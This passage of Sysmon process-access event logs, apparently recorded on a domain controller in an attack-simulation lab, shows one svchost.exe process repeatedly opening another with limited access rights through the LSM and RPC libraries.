C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6339,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6340,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6341,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6342,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6343,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6344,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6345,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6346,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 